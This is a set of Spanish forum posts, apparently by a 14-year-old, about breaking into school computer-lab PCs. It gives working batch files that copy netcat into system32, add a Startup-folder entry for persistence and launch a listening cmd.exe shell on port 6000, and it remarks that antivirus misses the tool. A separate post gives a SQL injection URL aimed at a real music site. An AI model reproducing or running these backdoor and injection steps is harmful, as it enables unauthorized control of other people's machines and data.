Mensajes

eso mismo iba a decir, el foro elhacker.net , no es smf 2.0


saludos

Bueno posteo algunas de mis fotos:)

mosquito;











si quieren seguir viendo mi flickr:

http://www.flickr.com/photos/fede_fotos

saludos!

a ver si podemos sacar algo de aca, nose si servira de algo:

http://www.goear.com/listenwin.php?v=%22%3E1+/**/ordEr+/**/++By+10--


adios

mejor aun!

saludos

no se olviden, que es mejorable mucho mas, y por favor diganlo jajja, esa es la ideaa

y si tienen algun metodo posteenlo

saludoos

aca estoy, jaja, em es asi la cosa, osea yo tengo una carpeta, que NO es necesario ser admin para manejarlas y modificarlas, osea no hay casi nada de seguridad.

entonces por ejemplo yo si quiero puedo modificarle el nombre de la carpeta, puedo manejar los archivos, modificarlos, casi todo se puede hacer 

entonces tengo que tener acceso fisico a cada una de las pc, y lo tengo, entonces me dirijo a la carpeta compartida que anteriormente había colocado los archivos, voy rapidamente sin que nadie se entere y ejecuto los dos archivos en su respectivo orden.

si funciona lo voy a comentar.

saludos

1º archivo:coloca el netcat en system32 y se ejecuta

Como que la seguridad no existe por acá.

El netcat no es reconocido por el nod 32 (no salta, en el escanneo si lo hace)

saludos!

Tu code no estaría mal si el nc.exe ya estaria en algun directorio, pero el problema es que el netcat en mi caso no lo estaba, entonces use el quick batch compiler, lo inclui (es una opcion que tiene el qbfc), y entonces use

@echo off
copy %MYFILES%\nc.exe %systemroot%\system32

no es necesario poner change directory, porque al estar en system32, se ejecuta desde alli y no es necesario

despues el otro copy si esta bien

start nc.exe -L -d -e cmd.exe -p 6000

esto tambien esta bien, pero acordate que no es necesario poner cd porque por eso se lo paso a system32, para no tener que cambiar de directorio

saludos!

PD:comenten si les gusto la idea, seria un buen intercambio de difierentes tipso de intrusiones, en diferentes escenarios con diferentes restricciones y posibilidades.

Diario de un alumno en clase de informatica

Gente, este es un post, en el que venía pensando hace tiempo y bueno, aca lo estoy haciendo. Trata de algo asi como una anecdota, o
algo "planeado" para una intrusion en las PC, de las computadoras de la escuela en la clase de informatica en la clase (no intervenir
desde una casa), para despues molestar o simplemente para matar el aburrimiento en la clase.

Esto podría ser:Un acto verídico (ya pasado), algo todavía no realizado (pero real).

NO romper lo siguiente: No se puede inventar el "escenario". Es decir algo que pasó o un escenario existente (no revelar cual XD).


Bueno empiezo con el mío:

14 computadoras (corriendo windows), en red (cable ), una maquina server (windows server 2000)

Resulta que en clase empeze a pensar alguna forma de ir teniendo el control de las Pc de la clase, lo primero que se me ocurrió ( y que tengo bien claro)
es el netcat, hacer multiples conexiones (directas), hacia mi PC, y ahi tener una shell, y por ende, una especia de control total
comenzé a investigar, y se encontraban algunas carpetas compartidas, y razoné que se podría "sacar jugo", entonces fui a la carpeta compartida
y luego hice 3 archivos(en mi casa los cree obviamente), dos, tienen que estar en la pc vicitma.

1º archivo:coloca el netcat en system32 y se ejecuta
2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida

ejecuto los 2 archivos, y entonces estaría funcionando, la mision, solo hace falta hacer un: net view, y conectarse

pero para la ejecucion de estos archivos tiene que ser por acceso fisico (que no es un gran problema, es solo ir a la carpeta compartida
y ejecutarlos).

ARCHIVOS:
1º archivo:coloca el netcat en system32 y se ejecuta.

lo tengo en .exe (lo compile con el quick batch compiler)
es facil su funcionamiento copia de %MYFILES% a system32
y lo ejecuta

2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida.

Código (dos) [Seleccionar] Expandir

@echo off
copy "D:\Misdoc\fede\intrusion escuela\base.bat" "%userprofile%\Men£ Inicio\Programas\Inicio\"
exit

simplemente eso.

3º archivo:ejecucion de un archivo (netcat a la escucha)

Código (dos) [Seleccionar] Expandir

@echo off
start nc.exe -L -d -e cmd.exe -p 6000
exit

simplemente eso.

Diagrama:

Como pueden ver es muy sencillo, programitas programados en batch.

si se preguntan porque los primeros dos archivos no los hice en uno solo:es porque ya lo habia intentado antes y me daba
siempre algún error.

asique decidi hacerlo por partes.

bueno aca termina, espero que no sea la ultima anecdota, o plan de intrusión.
en mi caso, todos los datos son veridicos, pero todavía no fue probado, vuelvo de un viaje y lo pruebo.

si no tienen ninguna anecdota lo que pueden hacer es como mejorrar, o facilitar, o para no tener que estar fisicamente en la pc ¬¬, a los planes estos, y si se llego hacer en la realidad por favor decir como salió todo obviamente.


PD: tengo 14 años dentro de todo esta bien jajaja
saludos

el tutorial que te pasé, es de los mejores explciados.

saludos!